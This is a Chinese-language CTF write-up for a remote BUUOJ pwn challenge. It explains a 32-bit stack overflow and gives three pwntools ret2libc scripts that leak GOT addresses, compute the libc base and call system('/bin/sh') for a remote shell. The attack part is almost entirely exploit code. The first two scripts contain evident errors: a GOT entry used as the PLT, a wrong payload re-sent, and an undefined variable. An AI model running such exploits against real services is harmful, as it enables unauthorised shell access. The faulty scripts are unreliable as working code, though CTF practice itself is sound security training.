file,checksec:
buf只有0x88字节大小,但read却可以往buf中输入0x100字节,使所以存在栈溢出。
且字符串中无/bin/sh,函数中无 system 函数,所以可以确定是ret2libc。
exp,这个exp可以泄露出write的地址:
from pwn import *
from LibcSearcher import *#start
r = remote('node5.buuoj.cn',25899)
elf = ELF('./pwn')
context.log_level = 'debug'#params
ret_addr = 8048199
write_got = elf.got['write']
write_plt = elf.got['write']
main_addr = elf.sym['main']#attack
payload = b'a'*(0x88+4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(0xD)
r.sendline(payload)write_real_addr = u32(r.recv(4))
print(hex(write_real_addr))#libc
libc = LibcSearcher('write',write_real_addr)
base_addr = write_real_addr - libc.dump('write')
binsh_addr = base_addr + libc.dump('str_bin_sh')
system_addr = base_addr + libc.dump('system')#attack2
payload2 = b'a'*(0x88+4) + p32(system_addr) + p32(main_addr) +p32(binsh_addr)
r.sendline(payload)
r.interactive()
exp2(这个exp泄露的是read的地址):
from pwn import *
from LibcSearcher import *#start
r = remote('node5.buuoj.cn',28419)
elf = ELF('./pwn')
context.log_level = 'debug'#params
ret_addr = 8048199
write_got = elf.got['write']
write_plt = elf.plt['write']
main_addr = elf.sym['main']
read_got = elf.got['read']#attack
payload = b'a'*(0x88+4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(read_got) + p32(4)
r.sendline(payload)read_real_addr = u32(r.recv(4))
print(hex(read_real_addr))#libc
libc = LibcSearcher('write',write_real_addr)
base_addr = write_real_addr - libc.dump('write')
binsh_addr = base_addr + libc.dump('str_bin_sh')
system_addr = base_addr + libc.dump('system')
# base_addr = write_real_addr - 0x0e56f0 #libc.dump('write')
# binsh_addr = base_addr + 0x17b8cf #libc.dump('str_bin_sh')
# system_addr = base_addr + 0x03cd10 #libc.dump('system')
#binsh_addr = 0x961df#attack2
payload2 = b'a'*(0x88+4) + p32(system_addr) + p32(0) +p32(binsh_addr)
r.sendline(payload)
r.interactive()
使用这两个地址的后三位,在 libc.blukat.me 网址中即可计算得到偏移。
之后编写总的exp:
from pwn import *
from LibcSearcher import *#start
r = remote('node5.buuoj.cn',28419)
elf = ELF('./pwn')
context.log_level = 'debug'#params
ret_addr = 8048199
write_got = elf.got['write']
write_plt = elf.plt['write']
main_addr = elf.sym['main']
read_got = elf.got['read']#attack
payload = b'a'*(0x88+4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(read_got) + p32(4)
r.sendline(payload)read_real_addr = u32(r.recv(4))
print(hex(read_real_addr))#libc
base_addr = read_real_addr - 0x0e5620
binsh_addr = base_addr + 0x17b8cf
system_addr = base_addr + 0x03cd10 #attack2
payload2 = b'a'*(0x88+4) + p32(system_addr) + p32(1) +p32(binsh_addr)
r.sendline(payload2)
r.interactive()
因为在libcsearcher中并没有找到匹配的libc,所以用了这种计算的方法得到了flag。